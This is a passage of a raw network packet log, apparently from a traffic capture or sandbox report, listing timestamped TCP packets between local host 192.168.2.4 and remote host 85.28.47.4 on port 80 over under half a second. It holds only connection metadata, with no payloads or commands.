                                            Jul 2, 2024 08:26:28.001718044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001718998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001729012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001739979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001751900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001760006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001765966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001775026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001776934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001787901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001790047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001799107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001808882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001813889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001815081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001827002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001838923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001841068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001849890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.001857042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.001879930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.083954096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.083995104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084007025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084064960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084111929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084124088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084136009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084150076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084163904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084191084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084328890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084341049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084352970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084364891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084364891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084378004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084402084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084429026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084609985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084657907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084743023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084754944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084767103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084779024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084783077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084789038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.084806919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.084841013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085062027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085073948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085084915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085095882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085108995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085114956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085114956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085124016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085139990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085149050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085154057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085165024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085190058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085200071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085555077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085567951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085597992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085611105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085649014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085661888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085673094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085680962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085685968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085695028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085696936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085709095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085714102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085721016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085728884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085732937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.085761070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.085778952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086344004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086355925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086368084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086380005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086390018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086400032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086409092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086411953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086424112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086436033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086441994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086447954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086458921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086464882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086471081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086483002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086487055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086498976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086499929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.086529016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.086548090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087205887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087219000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087229967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087259054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087279081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087341070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087352991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087364912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087377071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087380886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087388992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087400913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087405920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087412119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087424994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087430000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087438107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087450027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087450027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087461948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.087471962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087487936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.087512016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088249922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088263035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088273048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088284016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088295937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088311911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088320017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088330984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088342905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088344097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088354111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088363886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088366032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088380098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088380098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088393927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088402987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088407040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.088426113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.088444948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089179039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089190960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089201927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089212894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089224100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089234114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089236975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089255095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089257002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089270115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089279890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089284897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089293003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089297056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089312077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089319944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089324951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089335918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089343071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089349985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089359045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.089365005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089389086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.089402914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090127945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090142012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090152979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090164900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090176105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090176105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090192080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090194941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090207100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090219975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090219975 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090231895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090239048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090244055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090255976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090260983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090267897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090280056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.090285063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090302944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.090323925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.091314077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091326952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091337919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091348886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091361046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091372013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.091372967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091396093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091401100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.091408014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.091420889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.091447115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.172976971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173074007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173085928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173109055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173154116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173177004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173187971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173198938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173211098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173213005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173223019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173234940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173264027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173444033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173455000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173479080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173496962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173588037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173599005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173609018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173621893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173628092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173634052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173646927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173654079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173681974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173939943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173952103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173963070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173976898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.173984051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173984051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.173989058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174000978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174002886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174011946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174024105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174026012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174052000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174072027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174392939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174405098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174417019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174427032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174429893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174438953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174443960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174454927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174469948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174662113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174673080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174694061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174710989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174712896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174724102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174736023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174742937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174747944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.174767017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.174789906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175265074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175276995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175288916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175297976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175307989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175308943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175319910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175328016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175331116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175342083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175344944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175354958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175355911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175368071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175369024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175379992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175389051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175391912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175403118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175410032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175421953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.175432920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175455093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.175966024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.176007032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.219517946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.224536896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396034956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396071911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396085978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396116972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396138906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396146059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396178007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396218061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396234035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396260023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396269083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396326065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396337032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396358013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396364927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396383047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396394014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396511078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396517038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396522999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396528006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396534920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396548033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396562099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396596909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396856070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396873951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396887064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396902084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396903992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396912098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396918058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.396931887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396945953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.396965027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397171021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397185087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397197008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397208929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397221088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397228956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397238970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397243023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397257090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397263050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397269011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397289991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397305965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397741079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397753954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397767067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397778988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397788048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397795916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397798061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397809982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397820950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.397825003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.397833109 CEST806388085.28.47.4192.168.2.4
